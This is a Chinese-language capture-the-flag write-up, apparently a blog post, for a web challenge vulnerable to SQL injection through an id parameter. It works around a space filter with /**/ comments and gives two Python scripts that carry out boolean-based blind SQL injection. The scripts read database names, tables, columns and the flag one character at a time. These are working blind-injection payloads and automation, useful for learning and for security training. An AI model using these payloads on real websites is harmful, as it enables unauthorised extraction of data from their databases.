题目分析
![在这里插入图片描述](https://img-blog.csdnimg.cn/7c50c6f619b74a0ebc57e5a7f5897f36.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc2VjMG5kXw==,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center)
打开题目后,有三个文章
![在这里插入图片描述](https://img-blog.csdnimg.cn/4004087098864bbebba4658a02e77612.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc2VjMG5kXw==,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center)
随便点一个之后发现网址上有个后缀 ?id=2
应该是get传参的注入了
![在这里插入图片描述](https://img-blog.csdnimg.cn/5df525a108474f6abd2ad91b51f0a8f8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc2VjMG5kXw==,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center)
在后缀上加 ?id=1||1
显示全部文章,可能是整形注入,还是盲注
他这个过滤了空格,用/**/代替(详见web6 wp)
解题过程
盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题
import requests
s=requests.session()
url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.challenge.ctf.show/index.php'
table=""
for i in range(1,45):
print(i)
for j in range(31,128):
#爆表名 flag
payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#爆字段名 flag
#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#读取flag
#payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))
ra = s.get(url=url + '?id=0/**/or/**/' + payload).text
if 'I asked nothing' in ra:
table += chr(j)
print(table)
break
附上羽师傅的脚本
url = "http://124.156.121.112:28069/?id=-1'/**/"
def db(url): #爆库名
for i in range(1,5):
for j in range(32,128):
u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#"
s = url+u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
print(chr(j))
def table(url): #爆表名
for i in range(4):
table_name=''
for j in range(1,6):
for k in range(48,128):
u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#"
s = url+u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
table_name+=chr(k)
print(table_name)
依次跑得数据表,字段名,字段的值
![在这里插入图片描述](https://img-blog.csdnimg.cn/dcff5f3c171a4ffdae275826335fae93.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc2VjMG5kXw==,size_16,color_FFFFFF,t_70,g_se,x_16#pic_center)
![在这里插入图片描述](https://img-blog.csdnimg.cn/bb26523c296349c0a9f0ff8a43aa198e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc2VjMG5kXw==,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center)
运行了好几次,一直是到这一步就停了,就补充了个反括号去提交flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/846aba429a39438b897631716828c3ed.png#pic_center)
竟然通过了